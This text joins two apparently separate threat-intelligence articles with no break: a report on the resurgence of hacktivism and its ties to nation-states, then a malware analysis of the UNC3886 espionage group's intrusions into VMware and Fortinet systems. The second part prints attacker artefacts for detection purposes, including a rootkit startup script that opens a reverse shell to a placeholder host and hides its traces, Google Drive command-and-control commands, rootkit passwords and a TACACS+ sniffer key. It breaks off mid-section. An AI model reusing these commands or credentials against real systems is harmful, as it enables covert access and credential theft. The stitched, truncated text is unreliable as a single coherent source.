• Hacktivist attacks are often inspired by global events, but they frequently target organizations that do not necessarily play a role in the event itself. Targeting seemingly unrelated organizations allows the actors to claim attacks at a larger scale and to select high-profile targets—such as critical infrastructure or major businesses—in an attempt to increase group prestige and publicity for their attacks. Proactive monitoring enables defenders to identify when an organization or region is generally at higher risk, what events may be a precursor to hacktivist attacks, and when hacktivists have launched campaigns targeting similar industries or organizations.
• The threat is even higher for networks located in regions and industries with lower cybersecurity maturity, where victims are also more likely to face a significant or lasting impact from this activity. In such cases, proactive monitoring plays the same role as other detection mechanisms by allowing organizations to identify and mitigate immediate threats to their networks.

New Generation of Hacktivism: Increased Scale and Sophistication 

The term "hacktivism" was coined in the mid-1990s by a member of the hacker collective Cult of the Dead Cow. Originally, it referred to "online activism," where actors attempted to inflict damage on a victim by conducting attacks to influence audiences and communicate political or ideological beliefs. In the beginning, most hacktivist groups claimed to be motivated by anti-establishment objectives, which threatened governments and political institutions. In the early 2010s, hacktivist actors like those affiliated with the Anonymous collective impacted networks less resilient to threats such as distributed denial-of-service (DDoS) attacks—often resulting in widespread media attention. As cybersecurity matured and networks became more resilient—for example, with the creation of content delivery networks (CDNs)— and as law enforcement in some regions took legal action against these actors, anti-establishment hacktivism as a movement and its methods lost relevance over time.

After years of mostly low intensity and low impact operations, we observed a significant resurgence of new hacktivist groups and tactics around the onset of the Russian invasion of Ukraine and the Israel-Hamas conflict. A variety of hacktivist personas and groups have declared their allegiance to parties in these conflicts and targeted a long list of organizations and governments under such allegiance. The impact of their attacks has not been limited to stakeholders involved in conflict, but has also crossed borders to target third parties with loose association such as nationality, commercial relations, or opposing allegiance.

This new wave of hacktivist activity diverges from historic activity, particularly in the scale and breadth of groups and activity. Some hacktivist actors have shown an increased dexterity, more effectively conducting attacks in parallel with messaging to advertise their threat activity and influence audiences. Today, hacktivism is no longer only composed of low capability actors motivated by ideologies that reflect "traditional" anti-establishment hacktivism. We have observed a more frequent shift toward geopolitically and financially motivated groups attempting to obfuscate threat activity through hacktivist facades. While the concept of using a hacktivist facade as a front for state-sponsored activity is at least a decade old, we have not previously observed the frequency, volume, and intensity of overall hacktivist activity comparable to today.

Figure 2: Three types of motivations that drive hacktivist threat activity

We note that hacktivists do not necessarily act according to a single motivation. It is common for such threat activity to fluctuate between different categories and even change in parallel to evolving group dynamics. As a result, understanding the motivations behind hacktivist threat activity requires contextual analysis conducted over time.

The Medium Is the Message: Hacktivists' Promotion of Strategic Messaging Enables Actors to Conduct Information Operations

Influence is a central component of hacktivists' attacks and hacktivism often aligns in function with covert information operations, which involve the use of deceptive tactics to manipulate the information environment. Through strategic narrative promotion enabled via hacktivist personas, operators can maximize the real or perceived impact of attacks or gain attention to advance their agendas. Mandiant considers activity to be hacktivism when the actor's claims directly state or imply that their intent is political or social activism and involve a combination of three key tactics: persona development, tailored messaging, and often disruptive cyber activity. Notably, these tactics are critical in enabling hacktivism to achieve such influence. While there are many factors likely contributing to hacktivism's resurgence as previously noted, the in-built mechanisms to communicate messages and obfuscate their identities is likely part of the reason why hacktivist tactics are appealing to actors with a range of motivations.

Figure 3: Elements of hacktivism threat activity

Actors leveraging hacktivist tactics use overt personas to obfuscate the identity of their real operators and, in some cases, to generate the impression of organic public support for a given issue or event.

The hacktivist personas promote their messaging most often via direct claims or to persona-affiliated online assets such as on social media or actor-owned sites. The meaning can also be embedded in the attack itself, for instance, via the distribution of "tainted leaks" that feature altered or false information or conducting massive DDoS campaigns in parallel to geopolitical or cultural events. Strategic targeting and other high-profile claims also help groups increase the likelihood of receiving mainstream media coverage. 

Mandiant emphasizes the importance of carefully analyzing groups' messaging, claims, and any independent evidence available before drawing conclusions about an actor's motivation, capability, or efficacy, since hacktivist tactics incentivize such actors to inflate the impact of their actions and make otherwise inaccurate or wholesale fabricated claims. A proper understanding of hacktivist personas and the impact of their actions requires consistent analysis over time and in context of communications with other actors. In some cases, obtaining conclusive evidence is not possible.

Geopolitically Motivated Hacktivists Often Advance Strategic Objectives from Nation-States

Given the inherent overlap between components of hacktivist tactics and information operations, geopolitically motivated hacktivist actors often help advance strategic objectives from nation-states. Although in most cases the hacktivists likely operate independently, we have also uncovered recent instances of actors with strong links to state-sponsored cyber espionage groups. 

Geopolitically Motivated Hacktivists Linked with Nation-States

Some nation-state-sponsored actors have created hacktivist cutouts or established links with hacktivist personas as a front for their own activities. Hacktivist personas provide such actors with a mechanism to spread messaging that would otherwise be covert action but with a veil of plausible deniability for their cyber threat activity. In such cases, hacktivist messaging can help to draw attention to specific narratives or even influence real life events resulting in physical consequences, while the plausible deniability from using these cutouts expands the threat to both direct and third parties associated with any given event or issue. Hacktivist personas also offer well-resourced actors the ability to develop and/or leverage persistent assets and hacktivist brands that increase the likelihood of their messaging reaching the desired target audiences.

• In 2024 we released a report describing how Russian military group APT44 (also commonly known as Sandworm, FROZENBARENTS, and Seashell Blizzard) cultivated hacktivist personas as assets to claim responsibility for a series of wartime disruptive operations and to amplify the narrative of successful disruption. 
• Public sources have also indicated nation-state sponsorship for hacktivist groups such as pro-Iran CyberAv3ngers, which the U.S. government has linked to the Islamic Revolutionary Guard Corps (IRGC) and pro-Israel "Gonjeshke Darande" (Predatory Sparrow), which the Iranian government has attributed to Israel.
• As early as 2014, an iconic attack targeting Sony Pictures Entertainment illustrated nation-states' leveraging of hacktivist brands to engage in cyber threat activity. The attack, in which a false hacktivist front called Guardians of Peace (#GOP) wiped Sony's infrastructure and leaked a large volume of proprietary information, was attributed by the U.S. Federal Bureau of Investigation (FBI) to the North Korean government.

Geopolitically Motivated Hacktivists That Likely Act Independently

Although many of the recently active high-profile hacktivist groups we track explicitly describe their activity as supporting the interests of a nation-state, these pledges of allegiance do not necessarily mean that all such groups are linked to nation-states. We have also recurrently observed hacktivist groups that appear to act independently, but guide their operations with interpretations of the political rhetoric and policy objectives communicated from the leaders of the nation-state or political groups they support. In this case, while the threat activity may not be directed by national leadership, it still serves to advance its specific objectives.

• For example, on June 18, 2022, Lithuania imposed a ban on the rail transit of goods subject to European sanctions to the Russian far-western exclave of Kaliningrad. Following the imposed ban, pro-Russian hacktivist groups announced attacks on Lithuanian entities across multiple sectors after Russian leadership warned there would be consequences from Lithuania's action. The attacks continued until both countries reached a consensus. 
• In some instances, we have observed campaigns that can last for extended durations or be revived by different groups over time. Such is the case of repetitive spikes in hacktivist activity that we often observe in the Middle East associated with holidays such as Quds Day or the recurrent #OpIsrael, which has grown since at least 2013 to involve all sorts of hacktivist activity targeting Israel every year.

Figure 4. OpIsrael DDoS activity between August 2023 and April 2024

Outlook

Despite some resemblance to the original hacktivist groups that first emerged over a decade ago, the current wave of hacktivism exhibits distinct characteristics that are constantly evolving. However, the dynamic of how this new generation of hacktivism interacts with and relies on multiple components of cyber threat activity is complex and has been poorly articulated by current analysis. Modern hacktivist tactics are employed by a variety of actors with multiple motivations and rely on an array of techniques associated with cyber intrusion and information operations. Each hacktivist persona adopts its own set of techniques and operates in a different way, either to support their own ideology, influence geopolitical events, or to gain financial benefits. 

Defenders must proactively seek to understand how these groups operate and interoperate, which techniques they prefer or have had the most success with, and other components of their activity in order to build effective defenses and policies against these actors. A primary challenge to addressing this threat is that hacktivist actors use techniques from different domains, blending together methods that the security community often has tracked separately and differently. We intend to address this challenge in a follow-up blog post. 

For additional guidance on common mitigation strategies to protect from this and other types of threat activity, please refer to the following documentation:

• Proactive Preparation and Hardening to Protect Against Destructive Attacks
• Linux Endpoint Hardening to Protect Against Malware and Destructive Attacks
• Distributed Denial of Service (DDoS) Protection Recommendations 

Appendix: Common Cyber Disruption Techniques Employed by Hacktivist Actors

Technique

Description

Distributed Denial of Services (DDoS)

Attack that attempts to overwhelm victim infrastructure and disrupt service.

Hack & Leak

Attack directly leveraging, or otherwise benefiting from, traditional intrusion capabilities to covertly obtain and publish exfiltrated materials in a manner intended to influence target audiences. Leaks may also be used to disseminate altered or forged documents. Actors may also "leak" documents obtained through alternative means while falsely claiming successful intrusion operations. 

Website Defacements

Actors compromise a website and modify or replace its landing page with content intended to influence target audiences. Website defacements are a common tactic used by hacktivists.

Doxing

Actors disseminate personally identifiable information (PII) of a victim; disseminated information may not necessarily have been collected through data breaches or other intrusion activity. In most cases, doxing does not result in high impact to victims, with the exception of cases inciting to violence.

Network Intrusion

The attacker gains access to a specific network and either offers access or announces further disruptive activity. This includes, for instance, accessing user interfaces for industrial control systems and modifying parameters that may result in physical damage.

Written by: Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew Potaczek, Jakub Jozwiak, Alex Marvi

 

Following the discovery of malware residing within ESXi hypervisors in September 2022, Mandiant began investigating numerous intrusions conducted by UNC3886, a suspected China-nexus cyber espionage actor that has targeted prominent strategic organizations on a global scale. In January 2023, Mandiant provided detailed analysis of the exploitation of a now-patched vulnerability in FortiOS employed by a threat actor suspected to be UNC3886. In March 2023, we provided details surrounding a custom malware ecosystem utilized on affected Fortinet devices. Furthermore, the investigation uncovered the compromise of VMware technologies, which facilitated access to guest virtual machines.

Investigations into more recent operations in 2023 following fixes from the vendors involved in the investigation have corroborated Mandiant's initial observations that the actor operates in a sophisticated, cautious, and evasive nature. Mandiant has observed that UNC3886 employed several layers of organized persistence for redundancy to maintain access to compromised environments over time. Persistence mechanisms encompassed network devices, hypervisors, and virtual machines, ensuring alternative channels remain available even if the primary layer is detected and eliminated.

This blog post discusses UNC3886's intrusion path and subsequent actions that were performed in the environments after compromising the guest virtual machines to achieve access to the critical systems, including:

• The use of publicly available rootkits for long-term persistence
• Deployment of malware that leveraged trusted third-party services for command and control (C2 or C&C)
• Subverting access and collecting credentials with Secure Shell (SSH) backdoors
• Extracting credentials from TACACS+ authentication using custom malware 

Mandiant has published detection and hardening guidelines for ESXi hypervisors and attack techniques employed by UNC3886. For Google SecOps Enterprise+ customers, rules have been released to your Emerging Threats rule pack, and indicators of compromise (IOCs) listed in this blog post are available for prioritization with Applied Threat Intelligence. Mandiant recommends that organizations follow the security recommendations within the VMware and Fortinet advisories and the security recommendations provided in this blog post.

Zero-Day Exploitation

In January 2024, Mandiant published a blog post detailing UNC3886's activities exploiting CVE-2023-34048 (VMware vCenter) since late 2021. The exploitation enables unauthenticated remote command execution on vulnerable vCenter servers. Mandiant observed deployment of attacker backdoors minutes after crashing of the vulnerable VMware service.

CVE-2023-34048 was not the only zero-day vulnerability exploited by UNC3886 during these intrusions. The threat actor exploited three other zero-day vulnerabilities, which have since been patched, to gain access when obtaining and abusing credentials of existing accounts was infeasible. Figure 1 describes the UNC3886 attack path involving the following zero-day exploitations:

• CVE-2022-41328 in FortiOS was exploited to download and execute backdoors on FortiGate devices.
• CVE-2022-22948 in VMware vCenter was exploited to obtain encrypted credentials in the vCenter's postgresDB for further access.
• CVE-2023-20867 in VMware Tools was exploited to execute unauthenticated Guest Operations from ESXi host to guest virtual machines.

Figure 1: UNC3886 attack path diagram

Mandiant observed the threat actor exploit CVE-2022-42475 in FortiOS's Secure Sockets Layer (SSL) virtual private network (VPN) to obtain access in January 2023 after details of the vulnerability had been made public by Fortinet as part of their vulnerability disclosure processes. CVE-2022-42475 allows a remote unauthenticated attacker to execute arbitrary code or commands via specifically crafted requests.

Use of Publicly Available Rootkits for Long-Term Persistence

After exploiting zero-day vulnerabilities to gain access to vCenter servers and subsequently managed ESXi servers, the actor obtained total control of guest virtual machines that shared the same ESXi server as the vCenter server. Mandiant observed the actor use two publicly available rootkits, REPTILE and MEDUSA, on the guest virtual machines to maintain access and evade detection.

REPTILE

REPTILE is an open-source Linux rootkit, implemented as a loadable kernel module (LKM), that provides backdoor access to a system. The rootkit and backdoor functionalities are implemented as a separate component identified by Mandiant as follows:

• REPTILE.CMD is a user-mode component responsible for communicating with the kernel-mode component to perform actions including hiding files, processes, and network connections.
• REPTILE.SHELL is a reverse shell backdoor running in user-mode. The component could be configured to listen for a specialized packet in TCP, UDP, or ICMP for activation.
• REPTILE kernel-level component is an LKM responsible for hooking kernel functions and modifying functions data as tasked by REPTILE.CMD to achieve rootkit functionality.
• REPTILE LKM launcher is responsible for decrypting the actual kernel module code from the file and loading into the memory.

REPTILE appeared to be the rootkit of choice by UNC3886 as it was observed being deployed immediately after gaining access to compromised endpoints. REPTILE offers both the common backdoor functionality, such as command execution and file transfer capabilities, as well as stealth functionality that enables the threat actor to evasively access and control the infected endpoints via port knocking.

Mandiant observed that UNC3886 introduced several changes into the REPTILE code base and its auxiliary components. Some changes are based on the REPTILE code base before version 2.1, which was introduced on March 1, 2020, potentially indicating the actor has been developing and/or operating this rootkit for some time. 

One such change was identified within the UNC3886 REPTILE LKM launcher. In REPTILE version 2.0, the original developer of REPTILE altered how the kernel-level component is loaded, switching from using insmod to a custom launcher. The launcher Mandiant observed UNC3886 use throughout their operations, based on the custom launcher, was updated with a new function to daemonize a process. This function is identical to the publicly available create_daemon.c.

UNC3886 automated the deployment of REPTILE components with shell scripts. These scripts contained similar code to the installation script responsible for building REPTILE components and configuring a persistence mechanism for the REPTILE kernel-level component. The following additions were observed in the deployment shell script, which resulted in the creation of different forensic artifacts from the original REPTILE:

1. The threat actor replaced every instance of "reptile" with a unique keyword, which resulted in different filenames for rootkit component files.
   
   

   File Full Path

   Description

   /var/lib/fwupdd/<unique_keyword>_cmd

   REPTILE.CMD executable

   /var/lib/fwupdd/<unique_keyword>_reverse

   REPTILE.SHELL executable

   /var/lib/fwupdd/<unique_keyword>_start

   REPTILE startup shell script

   /lib/modules/<kernel_version>/kernel/driver
   s/<unique_keyword>/<unique_keyword>

   REPTILE kernel-level component

   /usr/bin/<unique_keyword>

   REPTILE LKM launcher

   
   
2. The script only deploys the pre-built REPTILE components and files to the paths listed as follows, and configures persistence mechanisms; it does not build the components.
3. While the original REPTILE relies on modprobe and udev in newer versions to load the kernel-level component, UNC3886 REPTILE relies on creating new RC scripts or systemd unit files with a command to execute REPTILE LKM launcher to load the kernel-level component, presented as follows. Only a few REPTILE samples were observed using udev as a persistence mechanism.

/usr/bin/< /lib/modules/<kernel_version>/kernel/drivers/ <unique_keyword>/<unique_keyword> 2>&- 1>&- 0<&-

Aside from the modifications made to the deployment shell script by the threat actor, the threat actor introduced a startup script containing execution commands and parameters for REPTILE.CMD and REPTILE.SHELL. The following is a sample of the startup script identified from one of the compromised guest virtual machines.

#!/bin/bash #<Centos_Selinux_Config_And_Module> /var/lib/fwupdd/<unique_keyword>_reverse -t <ip_address> -p <port> -s <secret> -r <seconds> /var/lib/fwupdd/<unique_keyword>_cmd hide `ps -ef | grep "ata/0" | grep -v grep | awk '{print $2}'` /var/lib/fwupdd/<unique_keyword>_cmd file-tampering #</Centos_Selinux_Config_And_Module>

The startup script tasks REPTILE.SHELL to connect back to the command-and-control (C2 or C&C) server and later configures REPTILE.CMD to hide the REPTILE.SHELL process from a process listing result and hide files from being visible. The analysis of the REPTILE samples revealed that the REPTILE.CMD was developed to hide file contents enclosed with a string #</Centos_Selinux_Config_And_Module> when the component is executed with a file-tampering parameter.

Mandiant identified a customized sample of REPTILE listeners with Transport Layer Security (TLS) support. The sample is able to receive communications using TLS over raw Transmission Control Protocol (TCP). Mandiant observed the threat actor deployed the customized version of REPTILE along with the victim's legitimate TLS certificate and private key obtained from the compromised FortiGate devices.

While UNC3886 was observed deploying new rootkits and backdoors with more functionalities, REPTILE appeared to be the first option to establish a foothold and possibly the last resort for maintaining access due to its small footprints.

MEDUSA and SEAELF

MEDUSA is an open-source rootkit implementing dynamic linker hijacking via LD_PRELOAD. Unlike REPTILE, which only provides an interactive access with rootkit functionalities, MEDUSA exhibits capabilities of logging user credentials from the successful authentications, either locally or remotely, and command executions. These capabilities are advantageous to UNC3886 as their modus operandi to move laterally using valid credentials.

Mandiant assessed the use of MEDUSA to be experimental alternatives of REPTILE and SSH keyloggers. The adoption of REPTILE was usually observed after the threat actor successfully gained access to compromised endpoints where it was used to deploy other malware, keyloggers, and utilities. MEDUSA, however, has been deployed subsequently on the same compromised endpoints in more recent activities.

Deployment of MEDUSA was accomplished by the MEDUSA installer component, identified by Mandiant as SEAELF. Mandiant identified two versions of MEDUSA deployed in the compromised endpoints, both using 0xAA as the XOR encryption key to encrypt configuration strings. Mandiant FLARE observed the following changes made by the threat actor to the samples:

1. The execve function that would normally filter output from iptables, ip, and the /bin directory no longer filter such output.
2. Output from strace, when executed by execve, is redirected to /tmp/orbit.txt by appending -o /tmp/orbit.txt to the command line.
3. The PAM functions no longer report SSH information and disrupt sudo requests by always returning PAM_SUCCESS(0). 
4. The following hook functions are missing in the sample:
   1. hosts_access
   2. shutdown
   3. close
   4. pam_acct_mgmt
   5. pam_sm_authenticate
   6. xread

Moreover, the file system evidence indicated changes to the MEDUSA configuration in one version that resulted in the creation and presence of various MEDUSA artifacts and host-based indicator locations as presented in the following table.

Name

Default Value

First Sample

Second Sample

MEDUSA administrator name

adm1n

Y0u4reCu6e

Y0u4reCu6e

MEDUSA administrator password

asdfasdf

1qaz@WSX3edc123

1qaz@WSX3edc123

MEDUSA home directory

/usr/lib/libc conf

/usr/lib/libc conf/

/usr/lib/locate/

ssh, scp, and sudo credential log

/usr/lib/libseconf
/sshpass2.txt

/usr/lib/libseconf
/local.txt

/usr/lib/locate
/local.txt

sshd credential log

/usr/lib/libseconf
/sshpass.txt

/var/log
/remote.txt

/var/log
/remote.txt

Backdoor listening ports

/usr/lib/libc conf/.ports

/usr/lib/libc
conf/.pts

/usr/lib/locate
/.pts

Mandiant observed the threat actor deploying and executing tools via MEDUSA to capture SSH valid credentials from the compromised endpoints. Upon starting, MEDUSA was configured to execute commands and executables listed under /usr/lib/locate/.boot.sh as follows:

/usr/sbin/libvird /usr/bin/NetworkManage chcon -t sshd_tmp_t /var/run/cron.data

The executables and the command constitute a component of the threat actor's attempt to hijack SSH connections with the objective of acquiring SSH credentials. Analysis of the executables and their attempts is discussed later in this report.

Malware Leveraging Trusted Third Parties as C2 Channel

The threat actor was observed deploying malware, including MOPSLED and RIFLESPINE, that leverages trusted third parties like GitHub and Google Drive as C2 channels while relying on the rootkits for persistence.

MOPSLED

MOPSLED is a shellcode-based modular backdoor that has the capability to communicate over HTTP or a custom binary protocol over TCP to its C2 server. The core functionality of MOPSLED involves expanding its capabilities by retrieving plugins from the C2 server. MOPSLED also uses a custom ChaCha20 encryption algorithm to decrypt embedded and external configuration files.

Mandiant observed sharing of MOPSLED between other Chinese cyber espionage groups including APT41. Mandiant considered MOPSLED to be an evolution of CROSSWALK, which can act as a network proxy.

Mandiant observed UNC3886 deploy the Linux variant, identified as MOPSLED.LINUX, on vCenter servers and a small number of the compromised endpoints where REPTILE already existed. MOPSLED.LINUX appeared to be used only as an initial malware deployed after gaining successful access since the malware does not have rootkit-like capabilities that could evade detection.

MOPSLED.LINUX was developed to communicate with a dead-drop URL to retrieve an actual C2 address. The sample associated with UNC3886 was observed sending HTTP GET requests to https://cyberponke.github[.]io/*. The response was decrypted using the ChaCha20 cipher to obtain the actual C2 IP address. Further communications are implemented as a custom binary protocol similar to HTTP/S.

RIFLESPINE

RIFLESPINE is a cross-platform backdoor that leverages Google Drive to transfer files and execute commands. It adopts the CryptoPP library to implement the AES algorithm to encrypt and decrypt the data transmitted between an affected machine and the threat actor.

To instruct RIFLESPINE, the threat actor creates an encrypted file on Google Drive with instructions for RIFLESPINE that is then executed by the malware on the target endpoint. The target endpoint's MAC address must appear in the filename when it is created. The file is downloaded, RIFLESPINE downloads and decrypts the file, and executes the instructions. The executions' outputs will be encrypted, stored in a temporary file, and then uploaded to Google Drive once more. The following instructions are available for execution:

1. Download file with get command.
2. Upload file with put command.
3. Set next call out time in milliseconds with settime.
4. Execution arbitrary commands with /bin/sh.

UNC3886 deployed RIFLESPINE with an open-source Google Drive CLI client. A systemd service file was created and used to execute the malware as the malware does not contain a persistence mechanism. Upon first installation, the malware collects system information and starts communicating with Google Drive service with the following steps:

1. Execute gdrive to obtain the file pertinent to the target endpoint with the following command:
   
   gdrive --refresh-token <token> list | grep "2@<mac_address>"
2. Write the filename to a temporary file /tmp/syslog<random_number.rs.
3. Download file to /tmp matching the filename with the following command:
   
   gdrive --refresh-token <token> download --path "/tmp" -f
4. Decrypt file /tmp/<filename> to /tmp/<download_filename>.de using CryptoPP AES-CBC with key libcrypt.so.2 and IV libev.so.5.
5. Read /tmp/<download_filename>.de line by line for instructions to execute.
6. After executing the instructions, write output to /tmp/update<random_number>.tmp.
7. Encrypt response from /tmp/update<random_number.tmp to /tmp/update<random_number>.tmp.en using the same AES keys as decryption.
8. Upload encrypted response with the following command:
   
   gdrive --refresh-token <token> upload --name "/tmp /update<random_number>.tmp.en"
9. Delay and repeat the previous steps.

Similar to MOPSLED.LINUX, RIFLESPINE was observed only in a small number of the compromised virtual machines. It is reasonable to assume that the threat actor abandoned the idea of using MOPSLED.LINUX and RIFLESPINE, which do not have rootkit functionality, as backdoors because predictable communications to GitHub and Google Drive services from virtual machine servers, rather than workstations, could raise suspicions.

Subverting Accesses With Backdoored Applications

Mandiant observed UNC3886 relying heavily on collecting and utilizing valid credentials for lateral movement between guest virtual machines running on the compromised VMware ESXi. The following section describes different techniques used by the threat actor to collect and abuse valid credentials.

Backdoored SSH Executables

After gaining access to the guest virtual machines, either through the collection of vpxuser credentials or by exploiting CVE-2023-20867 in conjunction with VMware Guest Operations abuse to facilitate malicious file transfer and execution, UNC3886 was observed deploying backdoored SSH clients and daemons. The purpose of these malicious components was the interception and collection of credentials within an XOR-encrypted text file.

Analysis of the compromised SSH client located at /usr/bin/ssh exposed modifications by the threat actor to the userauth_passwd() function, which governs password-based authentication. These modifications (detailed in Figure 2) introduce instructions designed to harvest SSH credentials from outgoing connections. The credentials are then XORed with 0xef before storage in the file /var/log/ldapd<unique_keyword>.2.gz.

Figure 2: Backdoored userauth_passwd()function

To facilitate the targeted collection of incoming SSH credentials, threat actors introduced modifications to the SSH daemon executable located at /usr/sbin/sshd. These modifications were specifically implemented within the auth_password() function, responsible for managing password-based authentication within the SSH daemon, and the sshpam_auth_passwd() function, which facilitates integration with Pluggable Authentication Modules (PAM). The injected malicious code functions analogously to that observed within the SSH client. However, in this instance, harvested credentials are stored within the file /var/log/ldapd<unique_keyword>.1.gz.

Figure 3: Backdoored auth_password()function

Figure 4: Backdoored sshpam_auth_passwd() function

In more recent threat actor activities, Mandiant observed the threat actor installed yum-versionlock to ensure that the malicious SSH clients and daemons would survive package upgrades. yum-versionlock enables the threat actor to exclude OpenSSH-related packages from the upgrade by adding the current version of OpenSSH packages to the versionlock.list file. Content of the versionlock.list file is presented as follows with the timestamp when the locks were added.

# Added lock on Tue Oct 25 23:28:07 2022 openssh-clients-0:8.0p1-13.el8.* openssh-server-0:8.0p1-13.el8.* Bring Your Own SSH Server

In addition to the backdoored SSH binaries deployed to collect SSH credentials, the threat actor was observed leveraging MEDUSA rootkit to deploy a custom SSH server with the same malicious goals.

Per the findings from MEDUSA rootkit analysis, Mandiant indicated that the threat actor utilized BOOT_SCRIPT parameter of MEDUSA located at /usr/lib/locate/.boot.sh to execute the following executables and a command on boot:

/usr/sbin/libvird /usr/bin/NetworkManage chcon -t sshd_tmp_t /var/run/cron.data

The hijacking of SSH connections to obtain credentials starts with the execution of /usr/sbin/libvird. Libvird, which is an injector based on a publicly available kubo/injector project embedded with a payload. libvird creates a library file identified as /lib64/libseconfd.so from the embedded payload and injects the library to sshd by default if both the target program and the library file are not provided.

Mandiant recovered and conducted analysis of the file with the same hash as the payload embedded in libvird. The analysis observed that the payload intercepts checkfd() of sshd when executed and verifies if the received data contains SSH-2.0-OpenSSH_6pf. The payload redirects the stream to the Unix socket /var/run/cron.data.

Mandiant identified /usr/bin/NetworkManage as a SSH server based on a publicly available SSH server wzshiming/sshd. The SSH server creates, monitors, and picks up the connection redirected to the Unix socket /var/run/cron.data.

Lastly, the final command inside /usr/lib/locate/.boot.sh was used to apply the SELinux security context of the Unix socket file /var/run/cron.dat to be the predefined sshd_tmp_t context, which is the security context tailored to temporary files used by the SSH daemon. This to ensure that the Unix socket used by the injector and the custom SSH server is accessible and writable when SELinux is enabled.

The threat actor was observed deploying another injector identified as sentry and the custom SSH server identified as sshdng-venter-7.0 on another endpoint. Analysis of the two executables identified the same injection and redirection operations as observed with libvird and NetworkManage.

Toward the Intrusion Goals The Remnants of Internal Recon and Lateral Movement

The objectives of the threat actor were initially unclear due to limited visibility and the extensive use of rootkits, tools, and scripts to eliminate forensic artifacts. When considering goal achievement, it is trivial to assume that a cyber espionage threat actor would focus on specific information. Yet pinpointing the exact type of information becomes challenging as it is situational. After a comprehensive analysis of the unallocated space of the compromised endpoints acting as a jump server, Mandiant identified some evidence that indicated what the threat actor's ultimate intentions may have been.

Mandiant successfully recovered scan logs generated by NMAP. The scan logs were created using the -oG parameter, which resulted in the recording of detailed scan information, including the NMAP executable, the scan initiation timestamp, the options, and the scan result. The sample log is presented as follows. Note that information related to victim organizations is redacted.

# Nmap 6.49BETA1 scan initiated [redacted] as: ./sc -sS -Pn -n --open --host-timeout 30 -T4 -v -oG result.txt -p 902,2012,4786,443 A.B.C.D/24 # Ports scanned: TCP(4;443,902,2012,4786) UDP(0;) SCTP(0;) PROTOCOLS(0;) Host: A.B.C.1 () Ports: 443/open/tcp//https///, 4786/open/tcp//smart-install/// Ignored State: filtered (2) Host: A.B.C.1 () Status: Up Host: A.B.C.1 () Status: Timeout Host: A.B.C.2 () Status: Up Host: A.B.C.2 () Ports: 4786/open/tcp//smart-install/// Ignored State: filtered (3) Host: A.B.C.3 () Status: Up Host: A.B.C.3 () Ports: 443/open/tcp//https/// Ignored State: filtered (3) Host: A.B.C.4 () Status: Up Host: A.B.C.4 () Status: Ports: 902/open/tcp//ideafarm-door/// Ignored State: filtered (3) Host: A.B.C.5 () Status: Up Host: A.B.C.5 () Status: Timeout Host: A.B.C.6 () Status: Up Host: A.B.C.6 () Ports: 4786/open/tcp//smart-install/// Ignored State: filtered (3) .......

The following observations were made from the sample scan log:

• NMAP executable: The threat actor brought their own NMAP executable for scanning. The executable sc was also located on the unallocated space and identified as a stand-alone version of the NMAP.
• Scanning parameters: TCP SYN scan was initiated in the aggressive mode without DNS resolution and host discovery, targeting TCP/443, TCP/902, TCP/2012, and TCP/4786 of 10.A.B.C/24. The result was recorded to result.txt with a record of only open or possibly open ports.
• Scanning results: The result indicates alive hosts with the open ports.

With the assumption that the services running on the alive hosts configured with the default port number, the alive hosts identified with TCP/4786 were possibly Cisco network appliances as the port is commonly assigned for Cisco Smart Install (SMI) service. TCP/902 indicates VMware technologies. By aggregating data from other scan logs and validating with the victim, it was established that the targeted networks belonged to foreign networks under the management of the victim organization. This marked the point at which a supply chain attack scenario became conceivable.

The existence of NMAP scan logs suggests that there is connectivity from the jump server to the foreign networks, although accessibility requires legitimate credentials. The final clue aligned with this assumption as the ongoing investigation uncovered malicious activities on a TACACS+ server accessible from the jump server.

TACACS is a network protocol used in computer networking for providing centralized authentication, authorization, and accounting (AAA) service. TACACS+ represents an enhanced and more robust version of the original TACACS protocol. Network appliances employ TACACS+ for security and access control, ensuring that authenticated users are authorized to execute actions that are monitored for auditing purposes.

An unauthorized access to a system functioning as an authentication server like a TACACS+ server is an absolute security nightmare. The threat actor could access or manipulate user credentials and authorization policies stored within its database. Accountability of TACACS+ would also be affected as the threat actor could tamper with the accounting logs stored on the TACACS+ server, covering their tracks and concealing malicious activities.

The following sections describe actions performed by the threat actor to extend their access to the target network appliances.

Capturing TACACS+ Credentials with LOOKOVER

The threat actor's first attempt to extend their access to the network appliances by targeting the TACACS server was the use of LOOKOVER. LOOKOVER is a sniffer written in C that processes TACACS+ authentication packets, performs decryption, and writes its contents to a specified file path. LOOKOVER uses the publicly available libpcap library to sniff TCP packets.

The threat actor deployed LOOKOVER on the TACACS+ server at /usr/sbin/au<unique_keyword>ditd. The sample required the following environment variables to be configured:

• TKEY - TACACS+ pre-shared key; contains default key 7ujm^YHN (required)
• FILTER - libpcap filter string (required)
• DEVICE - libpcap capture device (optional)
• SNFILENAME - processed data output path, optional with default set to /var/lib/libsyslog.so. All data written to this file is XORed with the single byte 0xEF.

Analysis of the LOOKOVER sample indicates that the samples process TCP packets whose first two bytes of data are 0xC0 and 0x01 and verify if the next byte is 0x01 or 0x03. The pattern aligns with TACACS+ packet header as described in RFC 8907 as follows:

• 0xC0 indicates the major (0xC) and the minor (0x0) TACACS+ version number.
• 0x01 indicates that the packet type is TAC_PLUS_AUTHEN.
• The next byte indicates the sequence number of the current packet; LOOKOVER targets if the sequence number is 0x01 or 0x03, which are commonly packets sent from the client to the TACACS+ server.

The sample verifies if the flag bit is 0x0, which indicates that the payload is encrypted. If the flag bit is 0x0, the sample then performs TACACS+ decryption by incorporating the first 12 bytes of TCP along with TKEY into an MD5 hash and uses the hash to XOR-decode the remainder of the TCP data. The decoded data along with the packet source IP address and an integer from the first 12 bytes are written to SNFILENAME.

If the next byte is nonzero, which could indicate a plain text payload, the entire data segment of the TCP packet is written to FILENAME.

Figure 5: LOOKOVER's function responsible for handling TACACS+ packets

During the analysis of the compromised TACACS+ server, Mandiant identified the presence of /usr/sbin/au<unique_keyword>ditd core dump file. Analysis of the core dump file revealed that the threat actor configured the FILTER environment variable as port 49 with /var/log/tac_cisco_<unique_keyword>_log as SNFILENAME. TCP/49 is used by TACACS+ Login Host protocol to handle an authentication request from devices. The process crashed when attempting to encrypt extracted credentials before writing to disks, and this could influence the threat actor to employ another approach to target TACACS+.

Backdoored TACACS+ Binary

On the same TACACS+ server identified with LOOKOVER, Mandiant observed the threat actor replaced the legitimate /usr/bin/tac_plus, which is the TACACS+ daemon for Linux, with a malicious version containing credential logging functionality.

